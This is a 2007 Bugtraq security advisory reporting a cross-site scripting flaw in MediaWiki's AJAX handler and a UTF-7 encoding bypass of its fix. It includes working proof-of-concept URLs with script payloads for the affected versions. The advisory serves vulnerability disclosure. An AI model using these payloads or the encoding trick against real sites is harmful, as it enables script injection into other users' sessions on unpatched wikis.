[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
MediaWiki Cross-site Scripting
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: MediaWiki Cross-site Scripting
- From: eyal@xxxxxxxxxx
- Date: 20 Feb 2007 04:29:01 -0000
MediaWiki Cross-site Scripting
Vulnerabilities.
Date:
18/02/2007
Vendor:
MediaWiki
Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.
Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack
by expliting the experimental AJAX features, if enabled (default). This XSS was
fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This fix
can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding
auto-detection has to be enabled for successful explitation.
Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions.
Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D
(URL Encoded)
Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24